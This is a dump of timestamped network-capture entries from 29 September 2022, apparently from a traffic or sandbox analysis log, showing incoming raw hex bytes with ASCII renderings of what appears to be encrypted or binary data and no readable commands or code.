                                                                                                                                                2022-09-29 12:48:59 UTC3635INData Raw: b5 43 a5 39 e1 8c ba cf a4 ff d3 96 e1 9b 43 5f 96 c7 2a 3b f1 2c 1e 4d 26 b4 26 5b cc 42 08 e7 5a 3e 42 3c b5 a2 42 3a fd b2 50 fe 1a b2 87 5b 3c 52 87 32 b6 f6 53 63 ba a9 9b f5 8c b5 4c e0 4b 24 41 39 e6 c5 70 d6 fc d9 57 6a d9 fd 34 8b 31 94 b1 b6 03 5b 1f db 7c 3b bb c3 e9 6c b8 bb 85 f8 a1 54 b0 94 b0 ec 40 52 ec ea f7 31 96 5b 59 da 63 f5 f2 31 bd bc a8 99 e7 dc 0d 73 58 16 ce 8d de 74 a4 56 a2 72 1b a6 f1 b5 74 00 5b de 53 e6 a7 6c 62 b5 ca 2f b7 80 05 f6 6d 1d ea 46 90 c3 43 c8 3e 84 71 76 08 aa 95 1a 85 10 fc 9e 45 c7 ae ec d5 e4 49 dc 50 f5 61 92 d0 21 f1 6a 57 ed 1e 38 c7 d2 ff 7f 52 20 0e 9b 57 cc ce d2 6c 9c 1e b0 47 a7 a4 08 4b 42 ad 29 49 3a d2 a3 d8 b9 1f f5 0d e1 8f 81 55 2e b2 54 53 82 79 37 44 0f b6 63 c5 ba ce d7 56 07 24 e9 71 42 aa
                                                                                                                                                Data Ascii: C9C_*;,M&&[BZ>B<B:P[<R2ScLK$A9pWj41[|;lT@R1[Yc1sXtVrt[Slb/mFC>qvEIPa!jW8R WlGKB)I:U.TSy7DcV$qB
                                                                                                                                                2022-09-29 12:48:59 UTC3651INData Raw: a5 73 42 cc 6b 55 5b 2a 1d 8e fd 06 a2 c4 c5 12 00 1c 36 21 86 27 d2 79 59 92 82 1f 37 3a 2b 97 a5 e9 67 9c 64 78 34 2c 79 88 9b 1b 79 bf 01 5b 83 b0 85 07 9d 6f 3a 74 5b 2c 79 8b a2 91 cc 35 56 1f f0 52 3d 7f f8 63 a9 a5 f3 49 61 f1 e8 8b 55 a9 61 86 a7 74 3c 41 66 4c 8b ec ca 36 0f bc db e9 69 6f 2c 52 c4 3c d6 39 51 34 4c a0 23 1c a6 77 dd 28 50 c8 b0 e6 bb eb c1 13 db 25 1a df cd 64 bc 14 20 1a 9f 1a 5b cc 7f b0 63 1c 16 43 59 3e 50 3f 5b 8a 26 ac e2 40 fc be ad a3 d2 48 0a 6b d9 5a 08 71 67 aa 2a 55 d6 20 a0 63 68 2f 34 c7 5c 8c fe 28 95 1d 9d 1b 39 64 20 42 15 9c f2 fe e5 16 35 7b 0f 61 f9 03 f9 76 91 6e 7d 7c 36 fc 77 9f 32 66 ed a3 38 77 19 a4 48 42 df 5c b8 d7 36 ef 90 1b 59 ae 28 64 ad 61 95 f7 6f 74 1b a0 60 1b 27 d3 80 dd f1 25 c1 de be cf 88
                                                                                                                                                Data Ascii: sBkU[*6!'yY7:+gdx4,yy[o:t[,y5VR=cIaUat<AfL6io,R<9Q4L#w(P%d [cCY>P?[&@HkZqg*U ch/4\(9d B5{avn}|6w2f8wHB\6Y(daot`'%
                                                                                                                                                2022-09-29 12:48:59 UTC3667INData Raw: 19 bf e4 18 bc c3 82 96 44 22 ca 34 e1 17 67 99 57 8e 4c 65 23 69 1f b5 ea e8 67 6c a2 01 44 5f 07 3c 54 86 b2 0b bc 69 6d 6e 61 0e 20 b9 42 06 83 1c bc ac a1 66 f8 48 f4 41 00 9e b8 ed 1c 40 65 71 b1 1e 8f 72 4a 44 f6 6e 01 51 41 e9 51 6c 2a a0 c8 11 a5 c8 1b fb 9c a4 74 a1 85 01 63 d8 6a 6c 8a ad 56 64 c2 45 08 e9 da df 4a ea 2f 3e f5 70 99 4b 4a d6 bc 66 bc a7 dc a9 02 94 34 48 12 85 ab 79 ec 20 0a bf 7b 41 95 d1 6e b6 e5 86 c0 da ce a8 02 9c 2e 61 15 1e 34 b2 d2 52 a6 31 be 6a 29 f5 e2 96 fc c4 8e 45 7e ce 83 88 23 e4 2c 89 af 7b 29 b1 bf 61 82 f1 c4 e9 06 51 d9 8f 8c 04 62 33 af cb 61 4b 5e b9 a8 d0 df 36 3c 65 66 e7 df 80 57 2c 10 f2 de 19 0f 3a 3a 1c ed bf 84 df 97 d3 d7 96 64 ee 8b b9 88 b5 a4 0d ff 41 f3 69 51 d8 e3 34 25 30 87 dd 2b b8 21 94 80
                                                                                                                                                Data Ascii: D"4gWLe#iglD_<Timna BfHA@eqrJDnQAQl*tcjlVdEJ/>pKJf4Hy {An.a4R1j)E~#,{)aQb3aK^6<efW,::dAiQ4%0+!
                                                                                                                                                2022-09-29 12:48:59 UTC3683INData Raw: 04 7f eb b8 44 a3 6b 2b d9 d2 f2 3e ce e2 cb 78 9f 0f 60 37 48 eb bf f2 cf 78 77 49 88 66 49 85 20 9a 30 42 1d b4 46 e5 d4 1b f6 3d 6f fd e0 06 8a 01 8c ed 39 2a 71 cf 36 1b d8 53 45 df 88 6d fb 5a cf 70 3d c9 ca 0f 58 69 75 68 94 bb b3 9f 81 1b 7a 5e cb 7c 6d 26 75 bf e9 94 b4 f1 5c 80 21 17 0d f9 96 8c 04 38 ee b6 06 09 7f 07 97 17 76 f1 a8 db 32 83 ff 2e 55 34 a2 90 2e e4 62 3c b4 e3 28 68 d8 95 17 05 d0 13 d7 f9 8c 46 9d 35 27 05 98 a3 1a d0 30 ac 1a dc a9 cb d5 40 4d 6e 32 51 c4 e9 8c c6 1b f8 d6 1b 60 a0 94 af 31 3d b8 62 23 b5 75 d6 a9 de 21 f6 6c 06 ef eb e4 3a 03 ce 4b e6 26 eb 38 6e 04 74 44 ea 29 99 1d 41 11 31 e3 93 ce 67 5e 39 20 5d 38 27 bb 06 4c 48 75 fc ad 43 8f 3d ec e9 c7 ac 46 25 fd 78 d6 c5 c4 03 be 64 ab 16 b1 ef 9b 01 92 fe 69 8b aa
                                                                                                                                                Data Ascii: Dk+>x`7HxwIfI 0BF=o9*q6SEmZp=Xiuhz^|m&u\!8v2.U4.b<(hF5'0@Mn2Q`1=b#u!l:K&8ntD)A1g^9 ]8'LHuC=F%xdi
                                                                                                                                                2022-09-29 12:48:59 UTC3699INData Raw: 0e 92 bc c5 22 59 33 56 34 ea 51 a1 e7 02 86 f4 02 2f fc d9 b4 fd 83 db a2 24 17 42 11 c4 2f 2d c6 7e 52 36 2d ac 97 96 ed b5 00 bc da e5 5a 73 14 f0 dc fc 88 13 77 76 2f 64 28 c3 ae 51 c9 a4 3b 1f b0 a2 f4 71 84 6f a1 56 02 eb 84 0f ce 14 c6 a9 72 50 b8 ca 7f 36 22 29 e9 ad 8d 24 6a bc b8 50 b9 69 3b aa b6 00 9d 04 e8 ea f8 01 54 ac cf 91 a2 ed d2 72 76 85 23 6f b6 fe 68 7f c1 43 9c 1e b7 61 5a 00 e0 53 f7 fc 68 0a de ce 12 cd 98 be 8c 85 f4 4a d5 57 21 48 31 8b 2f 57 a9 06 eb a8 b0 a0 9a ea 51 2c 58 15 ed 77 e2 83 c1 66 a8 7e 1e 2b 23 e9 5b bf a9 55 97 16 4c d7 44 75 1f da a1 51 96 dc 1c 76 35 da e7 13 b9 86 50 b8 96 78 f7 52 58 63 6a 2c 98 cd 66 8b c9 bd 2a a7 81 da 31 24 3a 26 47 23 7d e1 0c b5 e8 23 17 4a 83 fa 26 5d ef 4a 1b f3 ff e4 2f 04 79 a7 05
                                                                                                                                                Data Ascii: "Y3V4Q/$B/-~R6-Zswv/d(Q;qoVrP6")$jPi;Trv#ohCaZShJW!H1/WQ,Xwf~+#[ULDuQv5PxRXcj,f*1$:&G#}#J&]J/y
                                                                                                                                                2022-09-29 12:48:59 UTC3715INData Raw: c2 32 d8 ab 9b 80 c7 4f 4e 3d 90 f1 c2 82 29 24 e6 52 b8 40 bd 23 5d 65 db f3 86 8e 42 cb a2 8a 9d 9c 85 42 6a 30 98 e8 d5 fc 26 2f d1 dc 53 d1 fe 63 a3 5a f1 02 47 77 18 95 9e 83 f5 43 e9 fb e8 c4 7c 4a 8d 72 23 d0 62 30 c6 89 de 3c 3b 33 ca 12 69 1c a6 1f eb fb a8 82 50 8d f0 88 a7 44 0a 00 68 83 9d d3 1d db 61 56 89 4f cd d8 ea a1 49 2a c8 d3 4a cc c2 d0 7d ac c7 cb 96 3f 2e f4 28 d6 d9 03 fd ca f8 f9 20 f0 fd de 7d de bf 07 0b aa f5 fc 8c cb 41 84 d9 8f 98 62 4e 25 c4 80 f8 aa 56 23 c9 01 82 b3 1e e9 2c 61 b6 8c 01 44 9f 24 d1 81 aa 90 18 be 6e 0f 25 5b 04 14 fc c2 9e 3b f6 3d 36 37 0e 46 73 c4 d2 08 09 7c ba 16 0f 40 63 46 c9 9c d9 73 50 4a 89 bd 1e 6f 11 0b a9 7c df 74 cd 1d 9f 17 35 09 a7 56 a9 18 af fb d8 bb 61 c6 0d 16 8d 86 10 2b 38 07 0e 51 43
                                                                                                                                                Data Ascii: 2ON=)$R@#]eBBj0&/ScZGwC|Jr#b0<;3iPDhaVOI*J}?.( }AbN%V#,aD$n%[;=67Fs|@cFsPJo|t5Va+8QC
                                                                                                                                                2022-09-29 12:48:59 UTC3731INData Raw: 04 eb 87 25 44 71 48 90 5a 93 77 c6 ef 92 f8 fc a4 43 7b 06 07 08 71 ad a1 cd 4f 66 f9 5a 0c ab 1e 2c 51 c8 24 88 bd 1b af df 84 0d b8 38 c1 9f 38 6a dc b1 8f 4c 7f 52 7c e7 75 d9 f9 ce af da 7a 8e 16 26 58 b3 ee 1b c2 b5 84 fd 03 92 a3 fb cb 38 22 29 e8 74 f3 a4 05 e0 0a 17 9c a3 37 6c 61 06 64 7e 67 3e f7 96 65 eb a2 f0 64 ba 3c 7d b5 ed b5 2f ba 61 15 82 22 c5 78 f9 0e ce 24 7e 85 f1 dc 2c f4 a0 9b 3a a5 89 68 95 4b cd bb 57 f5 00 d2 a9 0e 28 7a 66 d4 d1 78 5f 35 79 33 20 55 43 4b e2 87 8a 65 f8 d6 d3 a7 4e 60 d2 17 e8 85 b0 4a ad d7 d4 72 2e f3 48 2d 2e 86 26 46 8f 90 ed 92 f8 5b 22 81 27 61 1c fb 08 a8 ff 86 b8 92 23 cd 69 52 0a 37 c1 d0 db 3c 79 bb 38 23 47 a9 7a 83 bf f0 78 9b 6d c6 40 37 03 49 34 ff e6 a2 e6 41 df 56 04 10 76 26 29 26 b5 3f d0 cd
                                                                                                                                                Data Ascii: %DqHZwC{qOfZ,Q$88jLR|uz&X8")t7lad~g>ed<}/a"x$~,:hKW(zfx_5y3 UCKeN`Jr.H-.&F["'a#iR7<y8#Gzxm@7I4AVv&)&?
                                                                                                                                                2022-09-29 12:48:59 UTC3747INData Raw: 58 01 ca 09 71 4f 24 f8 24 5c a3 3c 5d 92 14 fb af b7 c8 5c df 22 d9 89 15 82 31 5d 8f b3 f8 2e a4 23 94 21 cf d4 4d 3b 54 a9 30 11 3c 2d 48 79 1f d5 7d 8a b3 b2 c8 66 9f 3f 9e 5e ce 7f 44 55 c6 ce 12 67 c3 4f 08 96 c4 23 1a b1 bf c9 b6 d2 0a 02 38 25 dd 59 01 a4 11 ab 77 be 31 fd 2e f4 c7 99 b1 e6 34 b9 06 12 e7 dc f9 e8 a4 6d 9f 10 a3 fe 40 52 10 0f 2d 56 75 42 78 9c af 9e b1 07 82 59 a0 e7 78 c8 23 23 40 62 50 62 0f 4a 3d 07 d6 de b1 13 54 ac b9 31 ba f6 74 86 b7 4b fe 6f db 55 37 30 cc 79 4d 42 23 d8 01 52 ca d4 e8 05 a5 57 a4 8e 1d 58 e1 a1 8e 40 67 05 38 cb 5d 2c d3 42 52 0c 4c 12 33 0b 41 26 8b 8a 92 04 18 5c 7b 38 ad 4a 01 7a 6e a6 5f e7 41 a5 9c b7 9d 55 92 b7 d5 9b a1 18 f1 99 f3 ea b9 de fe 86 f9 c5 f6 51 9f 4a 77 de 3c f3 36 d4 98 64 b0 cf a2
                                                                                                                                                Data Ascii: XqO$$\<]\"1].#!M;T0<-Hy}f?^DUgO#8%Yw1.4m@R-VuBxYx##@bPbJ=T1tKoU70yMB#RWX@g8],BRL3A&\{8Jzn_AUQJw<6d
                                                                                                                                                2022-09-29 12:48:59 UTC3763INData Raw: 86 50 dd 59 02 dc 2d 9e e0 b0 18 c9 a6 94 b6 b5 3c b8 28 2c 04 75 84 26 80 17 5b 8a 76 6f 76 e4 36 78 1b 52 95 fe ce 21 1b 72 b0 4b a4 20 85 07 24 40 2e a2 91 88 0c 8a 4e 98 d2 e8 9c de de e9 bc 3f 9a bd fa 82 ae bb 12 e2 57 b5 9e 1e c2 cb a7 f7 a7 eb 82 2e 1c be 11 4d c1 05 77 ac 72 35 67 3b d0 03 a9 91 5b c8 b3 0a d1 48 28 cd 89 4d 14 0d 38 07 08 86 bc bb bc 29 95 8a 43 3a 2c e7 c2 b4 a0 c3 b3 52 54 36 18 c7 9d b0 69 f7 76 d7 56 45 7f bb 43 fa 64 f1 9d 4a ac 29 4a 43 d2 82 b6 29 5f 44 07 a5 09 98 9d ef b0 01 b4 e7 46 d3 9a 0a 4e c3 93 fc a7 90 36 fe f4 41 80 33 02 bf 91 33 59 3c 97 2c 93 63 30 b7 87 30 4e 36 22 e8 ce 91 cd 80 fc 32 18 c3 b5 f7 a0 f1 b0 a3 dc 5c 63 00 1e 07 be bd df ff ab 8b 89 f7 b0 bf 40 5b b3 99 6d be 93 06 36 9a 15 ac e6 2a 49 e4 67
                                                                                                                                                Data Ascii: PY-<(,u&[vov6xR!rK $@.N?W.Mwr5g;[H(M8)C:,RT6ivVECdJ)JC)_DFN6A33Y<,c00N6"2\c@[m6*Ig
                                                                                                                                                2022-09-29 12:48:59 UTC3779INData Raw: 46 bd a4 d9 9e ad 36 2f ad b1 91 06 24 98 3b 35 84 93 6e 2a 80 c7 c1 06 8c 17 1e ac 5f a5 47 b2 c6 66 13 a0 cd 70 a5 40 4a ea 72 80 44 07 75 65 e3 ea 3a 17 1e 6f d5 95 9f d8 ae 74 fd 4d 6b c9 e7 2d 4c 50 bc f2 d7 21 d6 8a 70 40 91 68 a5 6b 81 6a df 3d 9a 4f ab 57 44 93 f5 38 ee e5 90 88 68 9d 63 79 09 a0 b6 bf af 54 c0 f1 8b 0e b8 a6 26 b8 75 78 fd 88 5b 0b c6 5f d7 3d eb 5d 6b 76 88 55 fd 27 57 b5 fa 99 db a6 a9 d0 48 ef 67 bb ac 91 74 c6 03 22 f2 14 af 49 bf 58 6f 9f 0e 95 fe 55 0e 04 44 5f e7 46 3b cd 2b 6e cb 38 87 b7 e6 6d a1 9e bc 81 ea c4 4a 30 a9 d0 25 84 dc b8 cc b3 f7 16 3c 14 8c ae 02 23 22 a2 c7 33 f0 eb b3 b7 e8 87 5a e3 dd 9e 45 88 ad ca 69 fb dc c9 07 87 63 2a 52 e5 da 74 9f a0 c4 a1 54 ce 86 a5 b0 9e 4a 0e cd 68 43 f8 d2 d5 5f b2 59 9a bc
                                                                                                                                                Data Ascii: F6/$;5n*_Gfp@JrDue:otMk-LP!p@hkj=OWD8hcyT&ux[_=]kvU'WHgt"IXoUD_F;+n8mJ0%<#"3ZEic*RtTJhC_Y
                                                                                                                                                2022-09-29 12:48:59 UTC3795INData Raw: 61 61 03 a0 3a e7 6c 1b 80 e4 92 ea 3e e6 e2 97 6e b1 86 43 21 a9 5c da a7 85 cc 05 ca 9f d5 9e 8b 04 57 78 bd b6 f7 cd aa 1d d9 4e 6d eb 45 35 f9 66 ed 9a 3d 0a 26 43 17 1c c8 6b 62 54 22 03 0e bf d7 d5 a5 23 b6 17 44 fe 93 8e df 59 12 fc 23 b9 1c 31 01 c0 40 07 92 8f 6f 9c 05 32 4f 10 05 b9 9d 16 c1 a6 72 77 ed 29 52 3c e7 25 1c b7 76 1a c6 e3 28 ff a0 b6 fb bc 46 e7 84 af 38 f8 24 3b e3 45 74 34 0a 45 dc 82 41 36 37 e4 9c 42 67 c9 d9 3e 27 92 16 8d a0 40 54 bf 34 b4 67 94 04 2a c7 c5 04 a4 56 22 da 6f 26 80 b7 98 c3 a6 47 7f d0 f4 c8 ab 81 58 a2 ef d8 ee 05 17 88 52 67 7c c3 26 d3 a3 cb 64 5a 59 03 f7 78 9f 0b 6f 6b 22 f4 0a 6e 56 22 3f 95 33 8f 83 66 63 ae 5d 46 6b 56 fb 4f cc a6 ce b2 b4 5b d2 e8 92 96 df 2c 3b 70 be 2e d7 c2 1c 31 72 53 5a 32 81 7a
                                                                                                                                                Data Ascii: aa:l>nC!\WxNmE5f=&CkbT"#DY#1@o2Orw)R<%v(F8$;Et4EA67Bg>'@T4g*V"o&GXRg|&dZYxok"nV"?3fc]FkVO[,;p.1rSZ2z
                                                                                                                                                2022-09-29 12:48:59 UTC3811INData Raw: 9b a2 3a a5 37 e6 4f 96 9d 3f aa 2a ab 46 2f ff a0 96 5e e8 5d 68 e3 04 35 c5 31 44 87 3d c4 79 e8 f1 3b 94 e4 2c b2 d4 96 61 24 29 94 1e 6b 2c 76 28 a3 be 81 4a 80 0d e7 ae 27 8f 49 93 35 0b 67 b2 a3 b2 9d 20 dd eb 1e 88 b4 4a a6 b8 55 a8 4a 51 68 8a bd 7e 5a 84 18 82 42 c9 cf 5b aa 30 cf 31 c8 ae 69 b3 43 77 7d 9d 29 be e7 4f 37 26 c1 ce 7d 82 19 51 4e f5 e0 75 87 93 1d ad 60 44 36 4c 42 04 e8 ce 24 ff 85 9e df 66 74 d8 7a 35 ae bd d8 61 d5 b5 89 02 83 c7 69 d3 2f e9 e0 5c 17 9c c2 10 72 eb 32 b3 21 63 67 07 cf 81 55 d6 52 b5 06 53 5b 10 dc 39 26 1d 1d c6 3c 6b 39 19 af 0d fd ba 9a 47 95 69 58 bb 23 82 d3 9e ed d2 66 c5 b3 e5 b2 42 c9 8b ad d1 1f 28 21 66 7a 67 bb 2a 50 c9 c0 85 a6 bc ee 7e 31 34 aa 44 ab 6d dd f2 5f 1f 0a 37 46 64 bf b8 8d 63 69 2e dd
                                                                                                                                                Data Ascii: :7O?*F/^]h51D=y;,a$)k,v(J'I5g JUJQh~ZB[01iCw})O7&}QNu`D6LB$ftz5ai/\r2!cgURS[9&<k9GiX#fB(!fzg*P~14Dm_7Fdci.
                                                                                                                                                2022-09-29 12:48:59 UTC3827INData Raw: 7b 18 38 6d 14 e4 21 dd 95 0f 46 f9 88 40 97 13 5f 70 80 41 1c 09 c3 2f 33 d1 1c 99 14 48 19 9b 36 9c 52 ec a2 e5 d2 61 9d b9 a2 1c 6d d7 88 19 db 96 8b 4c 06 03 9a 7d 9f 21 e7 3f de b5 65 da dd d3 3c 30 e7 5c 20 b1 a0 6c d7 d7 61 8e 1d a9 7e e7 de 9a 6e b0 30 f5 7d 56 b0 48 1e 7a 2f 13 98 9c 3d 5a c5 3c 6e 04 e1 35 42 17 25 00 04 06 d2 2d 59 a8 5b d9 c8 3a 69 34 bc f6 78 9c d2 0a 8d 69 29 72 a9 28 59 6d bd a6 09 df 94 b7 f4 5b 17 03 21 c0 e7 c7 ac 73 50 8e 4f 00 27 a2 2e 8b ed 6b 9c f9 ac e6 2e fb 33 42 db 0e 2f 56 6b d5 2b 44 fb c9 05 4a 36 ef d8 6f 7c 45 27 6f 9b b2 b2 3c e9 50 82 fa 4f ba 76 93 01 cd 8a 73 7d ae 0e ff 8c bc 44 96 83 d6 84 bd c9 a5 f7 47 55 c5 43 35 29 83 e0 22 a7 0e 05 58 c8 61 f5 d2 a6 54 ba a6 0a 43 15 95 2e 94 a7 a7 10 c9 99 aa fa
                                                                                                                                                Data Ascii: {8m!F@_pA/3H6RamL}!?e<0\ la~n0}VHz/=Z<n5B%-Y[:i4xi)r(Ym[!sPO'.k.3B/Vk+DJ6o|E'o<POvs}DGUC5)"XaTC.
                                                                                                                                                2022-09-29 12:48:59 UTC3843INData Raw: ee d4 9c 57 04 7d 4a b0 61 65 d7 8a 7b 96 52 ac 73 3f 8d a7 29 c6 48 d0 15 ab d4 42 63 3a f9 42 5e 33 91 82 2e 12 a0 b7 20 73 0b 50 1d d4 a5 8c 3f 69 87 77 3a f0 04 02 9e 17 53 6c 38 71 f2 e4 09 2c 0e 47 5b 89 14 61 2a 29 cf 76 4b 44 2f 30 c1 a0 03 9d 71 df 99 e4 ae db dc 0f 95 eb 86 ae 60 05 b3 a8 fc 6b 00 1c a6 ae ab 67 8c 90 a6 4e 6a 8c e5 cb fd 0d 60 1b 9b 2b fc 81 8a aa 25 c4 a0 3f 05 ce 73 43 ba 43 ae b9 02 9f 0b e1 a2 70 af c3 b5 c9 30 e8 e4 1d db ef 44 11 a5 bb 63 2e 54 f9 b9 43 11 64 d6 c3 3b 49 a8 2a 8c 28 a8 c5 56 b3 fb 79 e3 e8 89 7e 2d 5a aa 22 61 f1 26 2c 43 b8 d8 8a 7b d5 5c 6d b9 76 36 02 92 d0 e5 d9 19 19 fd 8a 1f 97 0a 83 d7 c5 9c df 49 5b b1 06 70 f6 8c 3c 51 ef d2 9a 93 9e 9c e7 c9 e3 59 ef 0b b2 cf aa 3d 58 04 b7 08 e8 cc e4 a6 72 41
                                                                                                                                                Data Ascii: W}Jae{Rs?)HBc:B^3. sP?iw:Sl8q,G[a*)vKD/0q`kgNj`+%?sCCp0Dc.TCd;I*(Vy~-Z"a&,C{\mv6I[p<QY=XrA
                                                                                                                                                2022-09-29 12:48:59 UTC3859INData Raw: 55 c4 fd 7b b5 4f b0 eb 70 10 08 e8 ec 44 23 47 40 1c 3d 1f f2 48 fe c4 56 52 02 bd 41 57 a1 b0 df 1f 47 de 3e 6e b7 7d ec 83 b4 c8 d1 47 b3 57 af 83 2e a7 f7 d8 64 4e 94 07 fe 55 6b 52 4b 87 95 6e bc 5e 66 9a ca c6 f9 25 71 c3 50 7e ff 19 4a 44 a6 b3 89 0a 90 8d e6 1a 05 cc c8 7b 51 77 6d 92 c2 10 8c 5b fb 11 f2 54 f0 d1 5a 53 27 a9 5a 19 54 12 9e cb 7c a3 be 1f db 0d c8 01 0b 07 38 44 eb 43 73 b8 c5 47 ac de fa bc 6e 63 8e 50 1b 57 c1 7d 02 47 84 88 c2 7b c3 72 2a cd 6e 0a 18 c3 95 8f fe 0b 85 0d dd 12 81 e9 2c 02 e1 32 43 9e 83 5d 28 20 e9 b6 cd 0d 33 72 9d c3 42 a1 22 14 8e 01 ba e0 15 33 b6 42 3d 46 5a 6c ce 19 4e 0d 03 9a 89 41 5f 64 c4 f5 36 7d 19 7f a2 f1 18 8e 94 43 70 0c 08 1a 49 f1 7f 7d cb 8c ba b2 79 19 56 9f d8 b6 7c c2 9e 00 08 55 e7 b7 45
                                                                                                                                                Data Ascii: U{OpD#G@=HVRAWG>n}GW.dNUkRKn^f%qP~JD{Qwm[TZS'ZT|8DCsGncPW}G{r*n,2C]( 3rB"3B=FZlNA_d6}CpI}yV|UE
                                                                                                                                                2022-09-29 12:48:59 UTC3869INData Raw: 9d 47 4a 0c ae 39 ac 7e b8 37 a6 56 9e 2f 64 6e 5f 7d 9e 0e 08 4f ed 3c 2f e1 6a ee e1 2e c6 02 c9 dc 26 cf 82 b2 ff 88 06 54 83 12 33 de 26 d0 3d df 8a 14 36 ad f8 56 03 de 1c ad fe 0f 2b f4 5d 5e de db 80 85 da 90 a4 96 84 01 0d 40 38 9a e6 82 4d a6 a8 fd ea a4 b2 84 91 59 25 e8 ac 05 46 f7 87 91 1c 79 13 4a 17 d5 7d 28 75 bf c9 3c 42 a1 82 8a 34 74 27 0b f4 20 50 df 35 27 d9 8e a9 b4 31 13 a5 8e 17 27 df 73 50 e3 5d d6 4f 8e d4 ea b7 66 44 69 a3 c4 27 9a 83 15 18 5a 9a 2e f4 3d 05 d8 e7 f5 d3 e6 39 a7 02 62 df 29 9f ee cc b4 cf d2 62 fb ec 4a 30 05 74 de 52 4b ff 31 5b 21 10 fe 3b fd 1d 3d 72 48 2b de 37 79 03 a4 38 96 bc 35 d4 8e 73 9c b6 84 5a 4b 55 e6 da 73 63 44 fd b6 99 54 3b 09 f3 a2 2b da 79 86 60 82 c8 47 9f ee 51 75 0f 06 aa e9 ad f2 6f 17 43
                                                                                                                                                Data Ascii: GJ9~7V/dn_}O</j.&T3&=6V+]^@8MY%FyJ}(u<B4t' P5'1'sP]OfDi'Z.=9b)bJ0tRK1[!;=rH+7y85sZKUscDT;+y`GQuoC
                                                                                                                                                2022-09-29 12:48:59 UTC3885INData Raw: 1c d7 97 74 57 b2 21 70 79 fd c2 b1 13 d2 fc 79 f1 51 46 c4 91 1f d0 6d 10 56 a9 06 5c 93 da 8e 48 12 96 5c cf e3 49 df 40 a8 14 0e ba 0a 63 36 30 56 95 89 b4 b0 b9 f6 ae f4 1c de 6f d6 1b c6 4b 47 4d 85 bd 01 38 c1 1a 5f 1a 2f 7d 2f 5c 3e 14 95 6d 69 4d ac ff 8b e4 52 ca db cf 4c 07 84 8e b8 fb ec 7b bd eb f2 c7 31 b9 e0 9d 72 ca be 36 d6 b2 e3 69 bd 3c d3 d8 f8 8c 37 ee 06 5f b8 43 6f a6 c4 c5 4a ec 67 3f 17 28 af 9f 25 df 19 3f 72 06 4a fc d7 2d e6 94 db bd cd 17 5a e5 11 a2 40 e5 19 e9 75 2d 29 f4 5e 4c 76 ef 5b c4 0f b1 76 35 7a 84 a8 98 99 29 d6 5b df 48 f1 ae 35 63 7f 7d 72 43 80 7e 9f 12 c1 cc e5 7a d7 74 d1 f7 95 42 6b b4 05 c4 ed 6a 43 7f da 88 56 52 20 7e 4c a6 18 a0 dc b0 95 de 81 6c 8d 93 f1 ec 9e 2c f7 12 bb ea d4 a6 e3 b3 3b 64 4d a5 7c 3a
                                                                                                                                                Data Ascii: tW!pyyQFmV\H\I@c60VoKGM8_/}/\>miMRL{1r6i<7_CoJg?(%?rJ-Z@u-)^Lv[v5z)[H5c}rC~ztBkjCVR ~Ll,;dM|:
                                                                                                                                                2022-09-29 12:48:59 UTC3901INData Raw: f7 83 31 4c 2f b0 7b 94 d9 20 39 86 a4 a0 cf 77 fa a1 62 4e 02 ed 4d 64 c8 0f 0e eb a2 c4 89 a2 fd 77 e7 f6 f4 fe fa 7d b1 26 71 36 a3 43 af e9 08 9a 9d 86 45 7c 10 74 bd 91 e4 ba c8 1e d9 18 10 ce ca c7 e5 cd d0 55 0b 30 c9 62 32 d0 39 a3 81 88 4a 14 c1 6f 33 39 d8 82 b1 f9 ad 8b 91 a1 b7 c4 fc 1b e2 2f 5c ac 64 dd 9e 58 0f 88 47 0b 09 bc 69 1c 5b 29 f4 e4 86 ab f1 8e 8c 3f 87 fc 25 00 04 02 2b 56 07 1a 97 07 80 e7 10 7f f3 35 ca e9 6c a0 a3 12 ca 37 57 95 c9 90 69 ca 95 38 b6 8f 3c 44 15 2f ae 8e 3b 5f e8 72 46 86 75 06 ef 8a a8 88 5b dc 7b f6 08 af 15 48 bd 2b fc ed 07 81 4f 34 96 11 eb 60 e3 b7 93 64 4e 36 55 5b 81 aa bb 36 11 af 68 ec 46 3f 53 5a 5f 98 ea f4 3c fd fe 71 99 bd 8f 3c 0e aa 8a a8 2a 64 19 8d 4f 0a bf 4f f5 af 4f 91 fc 2f 17 c0 f3 87 3b
                                                                                                                                                Data Ascii: 1L/{ 9wbNMdw}&q6CE|tU0b29Jo39/\dXGi[)?%+V5l7Wi8<D/;_rFu[{H+O4`dN6U[6hF?SZ_<q<*dOOO/;
                                                                                                                                                2022-09-29 12:48:59 UTC3917INData Raw: 1f e7 3a 3d 4f 47 79 91 a1 70 e1 7e 8b e5 b2 a4 2f 30 12 93 9d dc 91 07 32 d0 e4 a9 24 d9 a4 e3 f6 31 38 f0 8d 4a ec f5 5b 35 0c a1 52 bd 6d 08 9e 18 00 83 a1 fc fc d3 e1 5b e1 20 d0 b6 88 b1 c3 c6 2d 72 5f 31 04 3c f1 e2 49 b6 dc 89 c5 cc a7 fa 21 3d b9 77 e0 f9 3c ed 79 ab 73 72 cf c4 9e 77 fc 66 a7 94 42 94 9e 80 8a 57 f8 86 96 b2 c9 4f 62 f9 ba b5 94 23 1d 59 12 df 11 24 45 c5 dd fc f8 12 61 cd 57 b1 80 ab 2a 00 b3 19 e2 c2 ea 00 54 f1 ce c0 e5 42 27 ee 49 4e 2b 38 87 59 e5 e8 60 fe 63 4e eb 57 11 e5 b4 d6 e7 25 6e b9 e6 f0 f2 00 ad b5 c3 85 74 c5 05 db 21 64 9d 9c 5e af 0c 2c ff 75 fb bd e1 0a 88 9c 3b 73 e2 34 48 28 98 dc 5f b6 88 79 c3 3f 5c 6c 93 61 aa 2c 52 5e 7f 65 3e bf a2 1a 87 ae fb 42 bc f3 ae cd 80 3e a5 9a fd 38 a1 8f a5 5c f5 27 a1 c0 4a
                                                                                                                                                Data Ascii: :=OGyp~/02$18J[5Rm[ -r_1<I!=w<ysrwfBWOb#Y$EaW*TB'IN+8Y`cNW%nt!d^,u;s4H(_y?\la,R^e>B>8\'J
